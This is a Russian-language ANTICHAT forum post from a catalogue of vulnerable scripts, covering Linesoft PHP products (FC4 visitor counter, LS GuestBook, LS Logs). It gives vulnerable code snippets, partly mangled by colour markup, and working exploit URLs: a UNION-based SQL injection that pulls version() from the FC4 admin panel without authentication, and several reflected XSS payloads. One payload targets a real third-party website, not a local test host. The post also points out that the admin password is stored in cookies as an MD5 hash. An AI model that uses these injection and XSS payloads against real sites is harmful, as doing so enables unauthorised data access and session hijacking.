ANTICHAT - Показать сообщение отдельно - Энциклопедия уязвимых скриптов

FC4 - Счетчик посетителей вебсайта

Офф сайт:http://linesoft.org/

Описание:SQL inj

Зависимости:mg=off и rg=on (rg скорей всего будет включен, т.к. если нет то скрипт работать не будет)

Файл: /admin/index.php

Уязвимый код:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"Counter"[/COLOR][COLOR="#007700"])

 {

   echo[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$AllCommands[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Counter.Change"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM fc4 WHERE Name=\"[/COLOR][COLOR="#0000BB"]$Name[/COLOR][COLOR="#DD0000"]\""[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]) 

      or print([/COLOR][COLOR="#DD0000"]"Ошибка при MySQL запросе: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]()); 

[/COLOR][/COLOR]

Авторизации никакой не требуется, там еще есть инъекции в insert,update,delete, эта самая простая

Exploit

Код:

http://127.0.0.1/fc4-0.34/admin/index.php?cmd=Counter&Name=tdsadas"+and+5=4+union+select+1,2,3,4,5,6,7,version()--+

Описание:пассивная xss

Зависимости:rg = on

Файл: admin/counter_form.php

Уязвимый код:

PHP код:


		
			
[COLOR="#000000"]

[/COLOR]">

[/COLOR]

из за того что register_globals = on и переменные в скрипте не определены по умолчанию, мы можем поменять их содержание

Exploit

Код:

http://127.0.0.1/fc4-0.34/admin/counter_form.php?cmd=">alert(/xss/)

============================

LS GuestBook v1.0

Офф сайт:http://linesoft.org/

Описание:пассивная xss

Зависимости:rg=on (rg скорей всего будет включен, т.к. если нет то скрипт работать не будет)

Файл: /guestbook.php

Уязвимый код:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]Пароль[/COLOR][COLOR="#007700"]:

[/COLOR][/COLOR]

$new_pwd обьявляеться в скрипте только если файла pwd.dat нет, а его нет только при 1 заходе

и установки пароля администратора

Exploit

Код:

http://www.bes-chagda.ru/ls_guestbook/guestbook.php?go=auth&new_pwd=1>alert(/xss/)

пароль администратора есть в куках, зашифрован в md5

=====================

LS Logs 1.22

Офф сайт:http://linesoft.org/

Описание:пассивная xss

Зависимости: rg=on (rg скорей всего будет включен, т.к. если нет то скрипт работать не будет)

Файл: /logsa.php

Уязвимый код:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

 [[/COLOR][COLOR="#0000BB"]Фильтр[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]строка в url[/COLOR][COLOR="#007700"]: 

 

[/COLOR][/COLOR]

Exploit

Код:

http://127.0.0.1/LSLogs/example/logsa.php?filter_string=">alert(/xss/)